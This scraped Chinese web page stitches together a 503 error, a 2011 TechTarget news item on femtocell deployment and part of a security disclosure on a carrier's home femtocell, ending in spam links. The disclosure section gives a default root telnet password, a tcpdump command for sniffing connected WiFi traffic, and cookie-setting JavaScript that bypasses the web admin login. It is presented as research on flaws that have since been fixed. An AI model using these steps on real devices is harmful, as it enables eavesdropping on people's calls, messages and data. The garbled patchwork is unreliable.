Femto基站定位:是骗局还是现实

503 Service Temporarily Unavailable
503 Service Temporarily Unavailable
openresty/1.9.7.4全球飞蜂窝Femtocell基站部署超宏蜂窝
日期:来源:
  在日前的2011中国Femtocell高峰会议上,Femto论坛副主席Andy Germano表示,在多年的技术和商业的发展之后,如今Femtocell已经进入了一个主流的领域。全球3G的Femtocell数量现在已经超过了宏蜂窝数量,达到230万。  据介绍,现在全球已有3个公共商业Femtocell部署。而更让人感到震惊的是,当今全球前十大运营商之中,七大运营商都在提供Femtocell的服务。  另据Andy Germano透露,截至2011年6月份,运营商的部署和承诺已经增加了200%,这意味着现在的部署越来越多,而且部署领域也越来越广泛。  点评:飞蜂窝和宏蜂窝基站的覆盖范围不同,因此做单纯的数量比较意义不大。但很显然,70%以上的移动数据业务来源于室内,而随着移动互联网等业务的发展导致了室内的移动数据流量激增,促进了运营商强化室内部署。在中国,室内覆盖的问题还远远没有解决,因此中国的飞蜂窝市场前景也十分广阔。
微信公众号
TechTarget
TechTarget中国
查看更多评论
敬请读者发表评论,本站保留删除与本文无关和不雅评论的权力。
阿尔卡特朗讯日前宣布,将依托Femtocell技术助力Telefonica提升欧洲及南美洲家庭和企业用户的移动语音及宽带互联网业务质量。
Femtocell低廉的价格和自适应的组网方式,已经被越来越多的运营商接受。目前业内主流的观点是它将成为3G覆盖和系统扩容的有力“助手”。
Femtocell可以实现与3G网络完全同等的数据能力,通过在住宅或企业环境部署小型本地蜂窝基站来扩展宏蜂窝网络,为提升现有网络数据能力提供了有力选择。
Broadcom在芯片和硬件方面的专长结合阿尔卡特朗讯small cells领先技术将共同定义下一代家庭网关。该集成设备可在DSL、电缆或光纤接入的家庭网关中直接添加small cells ,并且能将无线和有线语音、视频和数据业务扩展到住宅中的任何区域,包括无线业务“盲区”,从而从根本上改变家庭宽带体验。
自20世纪90年代后期起,基于IEEE 802.11b标准引入了企业无线网络,用无线网络取代昂贵的有线网络的可能性一直吸引着广大网络架构师和工程师。一个典型的事实是,越来越多的(企业)人使用无线网络进行工作,相应地,企业无线网络管理也被提上了重要日程。
交换机作为企业网络的核心连接设备,它的性能是保障企业网络速度的主要标准。但是大多数网络厂商的承诺与实际情况有很大的差异。
网络安全日益严峻,我们还能相信谁?幸好有网络访问控制(NAC),它采用了SSL VPN,禁止没有采取健全安全措施的客户端访问网络。
随着网络技术的发展,企业的关注点已经不再局限于对信息节点进行单纯的监控管理,同时也考虑到了“绿色”,虚拟化等更多的因素。在本手册中,我们将重点介绍绿色企业网络,企业无线局域网的安全,企业网络与虚拟化选择,以及其他与企业网络相关的技术、专家答疑。
TechTarget
企业级IT网站群
TechTarget中国 版权所有
All Rights Reserved, Copyright
TechTarget中国 版权所有
All Rights Reserved, CopyrightHTTP/1.1 新建会话失败Femtocell家庭基站通信截获、伪造任意短信漏洞
阿里移动安全团队与中国泰尔实验室无线技术部的通信专家们一起,联合对国内运营商某型Femtocell基站进行了安全分析,发现多枚重大漏洞,可导致用户的短信、通话、数据流量被窃听。恶意攻击者可以在免费申领一台Femtocell设备之后,迅速地将其改造成伪基站短信群发器和流量嗅探器,影响公众的通信安全。
家庭基站(Femtocell,又称飞蜂窝,Femto本意是10的-15次方)是运营商为了解决室内覆盖问题而推出的基于IP网络的微型基站设备,通常部署在用户家中,甚至直接放在桌面上。 随着运营商网络建设基本完成,宏站基本不再增加,Femtocell作为网优阶段解决信号覆盖盲区最有效的手段,倍受运营商青睐。由于Femtocell通过IP与运营商核心网直接连接,并从用户侧来看,是完全合法的基站设备。
Femtocell一般安装在用户触手可及的位置上,这就使得一直躲在通信机房这一天然物理安全屏障庇护下的传统通信厂商,终于要接受天下黑客的检阅了。然而,传统通信厂商在开发过程中的安全意识淡薄,导致了通信设备的安全漏洞比比皆是。近年来,BlackHat、DEFCON等安全大会上多次曝出Femtocell的安全问题。
漏洞细节已于日通报相关运营商,相关厂家已经针对此漏洞对全网设备进行了紧急修复,目前漏洞已经修复完成。出于推进安全研究的考虑,现在将漏洞的细节公开。
1 板卡概览
1.1 设备的获得
如何获得一台Femtocell设备呢?
在2015年4月初,我给10086打电话,报告说屋子里的信号很差(事实的确如此)。10086说如果家里有宽带,可以免费安装一台小基站。过了两天,安装的工程师就上门来装了。
Femtocell设备典型的安装位置如下图所示:
最大发射功率在30dBm,只有1W。而一般的GSM基站功率大约在20W左右。
Femtocell安装之后,效果的确非常好。原来室内GSM信号只有一格,偶尔会&无信号&,屋里的手机经常打不通。Femtocell开机之后,信号顿时变成满格,但制式是GPRS。大家家里没信号的话,可以打电话给10086申请,而且申请也是免费的。而且后续的话,运营商已经在准备3G和4G的Femtocell了。比需要架室外和室内天线的直放站方案稳定很多,而且架设方便。
在2014年10月,乌云上已经有人提交了Femtocell的漏洞一枚。据记录,在2015年1月被修复完成,漏洞公开。受这篇文章的启发,我们继续对Femtocell设备进行安全分析。发现了一些新的漏洞,并且旧的漏洞修复的也不彻底。
1.1 硬件组成
拆开发现里面有两块电路板,二者通过自定义标准的线缆相连,初步猜测线缆中至少有网络线缆4根。
一块是普通的WLAN AP,上面有Atheros的SoC芯片,与一般家用路由器无异。
另一块用于射频的板卡,主要由以下三部分组成:
TI的345MHz的DSP+ARM处理器OMAPL138B
Cyclone的FPGA
RF捷变器AD9365(左下角)
1.2 网络拓扑
2 WLAN 板卡渗透
2.1 root弱密码
可以直接telnet登录,然后就是一个拥有root权限的Linux shell了。
$ telnet 192.168.197.1
login: root
password: 5up
顺便提一句,这个密码应该是Atheros的参考设计板PB44的默认密码,很多厂商拿来都不改。在搜索引擎上以&5up&和&root&为关键词,可以搜索到不少有趣的东西。
并且发现上面的busybox基本没有裁剪,甚至连tcpdump功能都有。
于是,可以直接抓取到所有连上此WiFi的流量:
busybox tcpdump -i br0 not port 23
2.2 其它利用方式
/mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
闪灯 /mnt/flash/led_ctrl.sh [on|off]
3 RF 板卡渗透
3.1 Web 登录绕过
访问 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 获得用户名为
abmoc@24320
然后在USER.js里发现原有的登录绕过问题没有得到修复,于是在浏览器中打开Console,输入以下脚本即可登录:
SetCookie('role', 'marketUser');
SetCookie('username', 'abmoc@2;);
SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
document.cookie = &loginFlag=1;&;
window.top.location = 'main.asp?r=' + Math.random() + '#index';
登录之后,我们就拥有了与运营商派过来开站的工程师完全一样的操作权限!
以下是一些管理界面截图:
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】}

我要回帖

更多关于 1024最新基站地址 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信